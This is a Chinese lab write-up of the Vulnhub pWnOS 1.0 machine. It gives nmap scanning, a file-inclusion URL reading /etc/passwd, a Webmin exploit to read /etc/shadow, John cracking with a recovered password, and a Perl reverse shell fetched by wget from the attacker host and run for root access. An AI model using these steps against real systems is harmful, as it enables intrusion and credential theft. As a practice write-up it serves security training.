一、Namp扫描
1、主机存活判断
sudo nmap -sn 10.10.10.0/24
2、快速扫描
以不低于1w的速度快速扫描端口
sudo nmap --min-rate 10000 -p- 10.10.10.23
--min-rate #以不低于xxx的速度扫描
-p- #全端口
使用TCP和UDP的形式对扫出的端口进行协议的查看
3、TCP扫描
sudo nmap -sT -sV -O -p22,80,139,44,5,10000 10.10.10.23
-sT #以TCP协议进行扫描
-sV #服务的版本号
-O #服务器系统
-p #指定端口
4、UDP扫描
sudo nmap -sU -p22,80,139,44,5,10000 10.10.10.23
-sU #以UDP协议扫描
-p #指定端口
-oA #将扫描结果输出保存到某个文件夹下某个文件 例子是放在report目录下叫heavy-U文件
5、Namp的POC扫描
sudo nmap --script=vuln -p22,80,139,445,10000 10.10.10.23
二、访问web网页
访问80端口
尝试输入单引号看看返回结果如何,发现会报错出路径
直接尝试文件包含,我直呼好家伙
http://10.10.10.23/index1.php?help=true&connect=../../../../../etc/passwd
三、Webmin EXP
通过前面namp扫描结果,尝试使用EXP进行攻击·,这边提示的是文件泄漏漏洞
kali搜索EXP
searchsploit webmin
searchsploit webmin -m 2017.pl
查看exp的利用示例
sudo perl 2017.pl
漏洞利用
sudo perl 2017.pl 10.10.10.25 10000 /etc/passwd 0 #输入0是因为我们是http服务
查看shadow
四、John解密
解密出的用户密码vmware/h4ckm3
sudo john hash --wordlist=/usr/share/wordlists/rockyou.txt
五、登陆SSH
1、ssh登陆小插曲
直接连接ssh,发现登录ssh需要指定类型
![Vulnhub靶机实操笔记-pWnOS1.0-解法一]( "Vulnhub靶机实操笔记-pWnOS1.0-解法一")
2、添加ssh连接类型
sudo ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss [email protected]
六、内网提权
1、查看系统详情
uname -a
2、查看用户权限
sudo -l
3、查看定时任务
cat /etc/crontab
4、shadow细节反思
首先明确一点,能获得shadow一定是有系统权限或其他特殊权限。其次,我们是从webmin漏洞获得的shadow,并通过shadow去解密获得了一个账户密码拿到了一个初始shell。此时,应该考虑继续利用在webmin上面大权限的方面。在这种用户系统权限下构造反弹一个shell,再用webmin去文件包含调用它从而完成提权。
cd /var
ls -liah
5、攻击机构造shell.cgi
攻击机kali复制系统perl的shell.pl文件重新命令为shell.cgi
cp /usr/share/webshells/perl/perl-reverse-shell.pl shell.cgi
修改shell.cgi需要反弹的ip地址与端口
6、php 开启http
php 开启一个本地http server
php -S 0.0.0.0:8080 #本地开启http服务架设在80端口
sudo php -S 0:80 #简写版 开启http服务架设在80端口
受控机器远程下载shell.cgi,给shell.cgi文件执行权限
cd /home/vmware #vmware当前系统用户名
wget http://10.10.10.20:8000/shell.cgi
ls -laih
7、获得root权限
继续使用webmin文件包含漏洞exp
sudo perl 2017.pl 10.10.10.23 10000 /home/vmware/shell.cgi 0
成功反弹获得shell
七、靶场下载链接
https://download.vulnhub.com/pwnos/pWnOS_v1.0.zip
原文始发于微信公众号(黄公子学安全):Vulnhub靶机实操笔记-pWnOS1.0-解法一
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论